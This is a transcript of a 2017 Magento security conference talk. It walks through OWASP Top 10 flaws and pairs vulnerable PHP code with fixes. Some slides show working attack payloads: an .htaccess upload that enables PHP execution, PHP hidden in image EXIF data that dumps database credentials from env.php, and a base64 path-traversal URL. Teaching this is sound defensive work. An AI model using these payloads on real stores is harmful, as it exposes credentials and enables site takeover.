Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Magento Security from Developer's and Tester's Points of View

2,636 views

Published on

Magento Security from Developer's and Tester's Points of View - a presentation for Amasty's Lera and Alex speech for Meet Magento ES 2017 in Madrid.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Magento Security from Developer's and Tester's Points of View

  1. 1. Alexey Motorny 5+ years in Magento development All this time he’s been a proud member of Amasty team Took part in 50+ Magento 1 and Magento 2 projects Master of Science Magento Certified Developer
  2. 2. Valeria Shevtsova 5+ years of experience in testing Testing instructor Research degree in science Head of QA department
  3. 3. WHY SECURITY IS CRUCIAL Users’ personal data Commercial confidentiality Money Users’ trust FOR ONLINE STORES
  4. 4. VULNERABILITIES A1 – Injection A2 – Broken Authentication and Session Management A3 – Cross-site scripting A4 – Insecure direct object references A5 – Security Misconfiguration A6 – Sensitive Data Exposure A7 – Insufficient Attack Protection A8 – Cross-site Request Forgery (CSRF) A9 – Using Components with Known Vulnerabilities A10 – Underprotected APIs according to Open Web Application Security Project TOP 10
  5. 5. 1 2 3 А1 Injections SQL injections File injections Code injections 1.1 1.2 1.3 A3 - Cross-site scripting A4 - Insecure direct object references 4 A2 - Broken authentication and session management 5 A10 - API 6 More security stuff TODAY’S SECURITY BLUEPRINT
  6. 6. 1 2 3 А1 Injections SQL injections File injections Code injections 1.1 1.2 1.3 A3 - Cross-site scripting A4 - Insecure direct object references 4 A2 - Broken authentication and session management 5 A10 - API 6 More security stuff TODAY’S SECURITY BLUEPRINT
  7. 7. 10 1.1 SQL INJECTIONS: PATTERNS 1 2 3 4 Using GET POST variables without validation and processing $data = $model->getData(GET[‘field_name’]) Raw SQL queries, such as $sql = "INSERT INTO $table (attribute_id , store_id, $entityIdName, `value`) "; $db->query($sql); Building parameters of WHERE queries using concatenation $select->where(‘attribute_id = ’. $attributeId); Same goes to ->order() -> join() ->group() and other sql-functions
  8. 8. 1.1 SQL INJECTIONS THROUGH FORMS $userdata = $connection->fetchRow("SELECT firstname, lastname FROM admin_user WHERE username = '" . $observer->getUserName() . "'"); EXAMPLE 12
  9. 9. 13 RESULTS 1.1 SQL INJECTIONS THROUGH FORMS
  10. 10. 14 $userdata = Mage::getModel('admin/user') ->loadByUsername($observer->getUser()->getUsername()) ; 1.1 SQL INJECTIONS THROUGH FORMS PREVENTION AFTER BEFORE $userdata = $connection->fetchRow("SELECT firstname, lastname FROM admin_user WHERE username = '" . $observer ->getUserName() . "'");
  11. 11. 15 1.1 SQL INJECTIONS VIA URLS: PATTERNS
  12. 12. 16 $userName = Mage::app()->getCookie()->get('current_user'); $collection->getSelect()-where('username=' . $userName); 1.1 SQL INJECTIONS VIA COOKIES: PATTERNS AND IMPLEMENTATION
  13. 13. 17 $userName = Mage::app()->getCookie()->get('current_user'); $collection->getSelect()-where('username=?', $userName); PREVENTION AFTER BEFORE $userName = Mage::app()->getCookie()->get('current_user'); $collection->getSelect()-where('username=' . $userName); 1.1 SQL INJECTIONS VIA COOKIES
  14. 14. 18 1.1 SQL INJECTIONS VIA SYSTEM CONFIG DATA $query = $query . 'WHERE date_time < NOW() - INTERVAL ' . $days . ' DAY'; Mage::getSingleton('core/resource')->getConnection('core_write') ->query($query) ; PATTERNS AND IMPLEMENTATION
  15. 15. 19 PREVENTION 1.1 SQL INJECTIONS VIA SYSTEM CONFIG DATA $days = (int)$days; $query = "DELETE FROM `$tableLoginAttemptsName`"; $query = $query . 'WHERE date_time < NOW() - INTERVAL :days DAY'; Mage::getSingleton('core/resource')->getConnection('core_write')-> query( $query, array('days' => $days));
  16. 16. 20 1.2 FILE INJECTION: IMPLEMENTATION http://example.com/pub/media/customer/c/o/code.php ORDER DENY, ALLOW DENY FROM ALL
  17. 17. 21 1.2 FILE INJECTION: IMPLEMENTATION http://example.com/media/customer/_/h/.htaccess <IfModule mod_php5.c> php_flag engine 1 </IfModule> <IfModule mod_php7.c> php_flag engine 1 </IfModule> Order deny, allow deny from all http://example.comy/media/customer/_/h/.hcode.php
  18. 18. 22 1.2 FILE INJECTION: IMPLEMENTATION
  19. 19. 23 1.2 FILE INJECTION: PREVENTION 1 2 3 Forbid uploading PHP files. Block htaccess uploading Implement file uploading via Magento Uploader
  20. 20. 24 1.2 FILE INJECTION: IMAGE INJECTION EXAMPLE http://example.com/media/customer/_/h/.htaccess AddType application/x-httpd-php.jpg Order deny, allow deny from all jhead -ce apple.jpg <h1> <?php if (isset($_REQUEST['cmd'])) { $test = require_once ("../../../../../app/etc/env.php");var_dump($test["db"]); } else { echo '<img src="./.h-apple-orig.jpg" border=0>'; } ?> </h1>
  21. 21. 25 1.2 FILE/CODE INJECTION EXAMPLE http://example.com/pub/media/customer/_/h/.h-apple.jpg?cmd=test
  22. 22. 26 1.2 FILE/CODE INJECTION PREVENTION BEFORE $uploader = new Mage_Core_Model_File_Uploader( 'image'); if ($allowed = $this->getAllowedExtensions($type)) { $uploader->setAllowedExtensions($allowed); } $uploader->setAllowRenameFiles(true); $uploader->setFilesDispersion(false); $uploader->addValidateCallback (Mage_Core_Model_File_Validator_Image::NAME, Mage::getModel('core/file_validator_image'),'validate'); AFTER
  23. 23. 1 2 3 А1 Injections SQL injections File injections Code injections 1.1 1.2 1.3 A3 - Cross-site scripting A4 - Insecure direct object references 4 A2 - Broken authentication and session management 5 A10 - API 6 More security stuff TODAY’S SECURITY BLUEPRINT
  24. 24. 28 PATTERNS CONTROLLER $customData = $this->getRequest()->getParams(); $model->setCustomData($customData) $model->save(); 2. CROSS-SITE SCRIPTING VIEW <?php echo $model->getCustomData()?>
  25. 25. 29 IMPLEMENTATION 2. CROSS-SITE SCRIPTING
  26. 26. 30 IMPLEMENTATION 2. CROSS-SITE SCRIPTING
  27. 27. 31 IMPLEMENTATION 2. CROSS-SITE SCRIPTING
  28. 28. 32 IMPLEMENTATION 2. CROSS-SITE SCRIPTING
  29. 29. 33 IMPLEMENTATION 2. CROSS-SITE SCRIPTING
  30. 30. 34 PREVENTION 2. CROSS-SITE SCRIPTING $value = $this->helper->escapeHtml($value); public function escapeHtml($data, $allowedTags = null)
  31. 31. 35 ADMIN ACCESS 2. CROSS-SITE SCRIPTING
  32. 32. 36 ADMIN ACCESS 2. CROSS-SITE SCRIPTING
  33. 33. 37 ADMIN ACCESS 2. CROSS-SITE SCRIPTING
  34. 34. 1 2 3 А1 Injections SQL injections File injections Code injections 1.1 1.2 1.3 A3 - Cross-site scripting A4 - Insecure direct object references 4 A2 - Broken authentication and session management 5 A10 - API 6 More security stuff TODAY’S SECURITY BLUEPRINT
  35. 35. 39 3. INSECURE DIRECT OBJECT REFERENCES
  36. 36. 40 3. INSECURE DIRECT OBJECT REFERENCES REVEALING VULNERABILITIES $file = $this->getRequest()->getParam('file'); $fileName = CustomerMetadataInterface::ENTITY_TYPE_CUSTOMER.'/'. $file; ‘../../../app/etc/env.php’ /var/www/html/magento/pub/media/customer/../../../app/etc/env.php
  37. 37. 41 3. INSECURE DIRECT OBJECT REFERENCES FILE NAME REPLACEMENT http://example.com/amcustomerattr/index/viewfile/file/Li4vLi4vLi4vYXBwL2V0Yy9lb nYucGhw/customer_id/1/
  38. 38. 42 3. INSECURE DIRECT OBJECT REFERENCES RESULTS
  39. 39. 43 3. INSECURE DIRECT OBJECT REFERENCES PREVENTION $file = Uploader::getCorrectFileName($file); /** * Correct filename with special chars and spaces * * @param string $fileName * @return string */ public static function getCorrectFileName($fileName) { $fileName = preg_replace('/[^a-z0-9_-.]+/i', '_', $fileName); $fileInfo = pathinfo($fileName); if (preg_match('/^_+$/', $fileInfo['filename'])) { $fileName = 'file.' . $fileInfo['extension']; } return $fileName; }
  40. 40. 1 2 3 А1 Injections SQL injections File injections Code injections 1.1 1.2 1.3 A3 - Cross-site scripting A4 - Insecure direct object references 4 A2 - Broken authentication and session management 5 A10 - API 6 More security stuff TODAY’S SECURITY BLUEPRINT
  41. 41. 45 4. DIRECT LINK ACCESS EXAMPLES http://exmaple.com/media/customer/passport/1.jpg http://example.com/media/customer/passport/2.jpg PREVENTION http://example.com/amcustomerattr/index/viewfile/file/Li4vLi4vLi4vY XBwL2V0Yy9lbnYucGhw/customer_id/7dc4acc58270/
  42. 42. 1 2 3 А1 Injections SQL injections File injections Code injections 1.1 1.2 1.3 A3 - Cross-site scripting A4 - Insecure direct object references 4 A2 - Broken authentication and session management 5 A10 - API 6 More security stuff TODAY’S SECURITY BLUEPRINT
  43. 43. 47 5. UNDERPROTECTED APIS
  44. 44. 48 MORE SECURITY STUFF 1 2 3 4 6 When buying extensions from Magento vendors, always pay attention to security questions Install security patches in time Use additional backend security measures Check if user and admin passwords are strong enough Use Security extensions Configure your servers for safety5
  45. 45. 49 DETECT VULNERABILITIES LIKE A BOSS 1 2 3 4 6 Look for unwanted access to users’ data via direct links Look for known patterns Check forms, URLs to prevent SQL and JavaScript injections Check user cookies Make sure admin area has no security holes Test files uploading via file upload inputs5
  46. 46. 50 TIPS ON WRITING SAFE APPLICATIONS FOR MAGENTO 1 2 3 4 6 Make sure your server environment is configured for safety Validate all the incoming data Data escaping is a must! Check extension for getting access to important files Data validation for API is a must Use Magento functions5
  47. 47. THANK YOU!

×